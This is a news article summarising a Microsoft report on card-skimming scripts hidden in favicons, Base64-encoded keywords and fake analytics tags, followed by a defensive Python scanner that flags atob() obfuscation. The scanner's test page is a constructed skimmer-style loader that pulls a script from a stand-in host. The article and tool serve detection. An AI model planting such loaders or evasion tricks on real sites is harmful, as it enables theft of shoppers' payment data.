Bank cards hacked, MICROSOFT alerts

Microsoft has published a report warning of new methods hackers use to hide their scripts on compromised sites. In particular, they use Base64 encoding to conceal the loading of external files and make their code appear harmless.
Injecting code into merchant sites to steal bank card details, known as skimming, is nothing new. However, as with every threat on the web, the authors constantly refine their tools to stay one step ahead of cybersecurity professionals. According to a new report from Microsoft, hackers have developed new techniques to hide their code and evade detection.

Initially, hackers targeted vulnerabilities in platforms such as Magento, PrestaShop or WordPress and contented themselves with injecting JavaScript. One of the best-known attacks of this type is Magecart, first discovered in 2010, which caused a new wave of attacks in 2019. The new techniques still require a vulnerability that lets the attacker inject data into the server, but the JavaScript code is no longer left in plain view.

Malicious code hidden in an image
The first approach is to disguise the code as something else. Microsoft discovered JavaScript encoded in Base64 inside PHP code, which was itself embedded in an image. In one case the authors used the favicon (the site icon shown in the address bar or in bookmarks), and in another a plain image. All they had to do was add a PHP include() of that file to the site’s index page, an addition that nobody would notice. In both cases, the PHP script checks the page title for the terms “checkout” and “onepage”, which correspond to the Magento payment page. It also checks cookies to make sure the visitor is not the site’s administrator. Once these checks pass, it decodes a JavaScript payload that displays a fake payment form and sends the entered data to an external server.

Hiding keywords by encoding them in Base64
The second method adds four lines of JavaScript to the page. As before, the script runs only on pages whose title contains the term “checkout”, but the keyword is Base64-encoded in the script so that it goes unnoticed. The script then downloads another script hosted on an external server, whose address is Base64-encoded and split into several substrings that are concatenated at run time. That second script makes sure the browser’s developer tools are not open, then stores the payment form data in an image that is sent to an external address.

Finally, in the third method, hackers disguise their script as an official Google Analytics script or as Meta Pixel, Meta’s audience analytics software. Again, the authors added a simple script that downloads a second script from an external server, using Base64 encoding to mask its address.

What all these techniques have in common is the use of Base64-encoded strings, in particular the JavaScript atob() function to decode them, and searching for that pattern can help developers detect compromised sites. Internet users, on the other hand, have few ways to defend themselves against this type of attack, apart from measures such as single-use virtual bank cards. For site administrators, Microsoft advises checking that the CMS and all its extensions are up to date.
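As an added illustration of that detection hint (example code written for this article, not taken from Microsoft’s report), the following Python scanner reassembles string literals concatenated into an atob() call, decodes them, and flags a hidden URL, a hidden payment-page keyword, or a PHP include() of an image file. The sample pages and the exfil.example.invalid hostname are constructed for the example.

```python
import base64
import re

# Constructed samples (not from the report) reproducing the three patterns described above:
# a PHP include() of an image, a Base64 "checkout" keyword, and a URL split into fragments.
_KEYWORD_B64 = base64.b64encode(b"checkout").decode()
_URL_B64 = base64.b64encode(b"https://exfil.example.invalid/loader.js").decode()
_SPLIT_URL = '"+"'.join(_URL_B64[i:i + 4] for i in range(0, len(_URL_B64), 4))
SUSPICIOUS_PAGE = (
    '<?php include("images/favicon.ico"); ?>\n'
    '<script>if(document.title.indexOf(atob("' + _KEYWORD_B64 + '"))>-1){'
    'var s=document.createElement("script");s.src=atob("' + _SPLIT_URL + '");'
    'document.head.appendChild(s);}</script>'
)
CLEAN_PAGE = '<script>var t = atob("' + base64.b64encode(b"hello world").decode() + '");</script>'

_LITERAL = r'(?:"[^"]*"|\'[^\']*\')'
ATOB_CALL = re.compile(r'atob\(\s*(' + _LITERAL + r'(?:\s*\+\s*' + _LITERAL + r')*)\s*\)')
STRING = re.compile(_LITERAL)
IMAGE_INCLUDE = re.compile(r'\binclude(?:_once)?\s*\(?\s*[\'"][^\'"]+\.(?:ico|png|gif|jpe?g)[\'"]', re.I)
URL_LIKE = re.compile(r'^(?:https?:)?//[\w.-]+', re.I)
CHECKOUT_WORDS = ("checkout", "onepage")

def decode_atob_literals(src):
    """Yield (fragment_count, decoded_text) for every atob() whose argument is one string
    literal or several literals joined with +, reassembling the pieces before decoding."""
    for call in ATOB_CALL.finditer(src):
        parts = [lit[1:-1] for lit in STRING.findall(call.group(1))]  # strip the quotes
        try:
            decoded = base64.b64decode("".join(parts), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass: not valid Base64
            continue
        yield len(parts), decoded

def scan_page(src):
    """Return human-readable findings for one page's HTML/JS/PHP source."""
    findings = []
    if IMAGE_INCLUDE.search(src):
        findings.append("PHP include() of an image file (possible code hidden in an image)")
    for count, decoded in decode_atob_literals(src):
        if count > 1:
            findings.append(f"atob() argument split into {count} fragments -> {decoded!r}")
        if URL_LIKE.match(decoded.strip()):
            findings.append(f"atob() hides a URL -> {decoded!r}")
        if decoded.strip().lower() in CHECKOUT_WORDS:
            findings.append(f"atob() hides a payment-page keyword -> {decoded!r}")
    return findings

if __name__ == "__main__":
    for name, page in (("suspicious", SUSPICIOUS_PAGE), ("clean", CLEAN_PAGE)):
        print(name, scan_page(page))
```

Run over a site’s checked-out theme and template files, a non-empty result is a starting point for a manual look, not proof of compromise; legitimate scripts also use atob().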
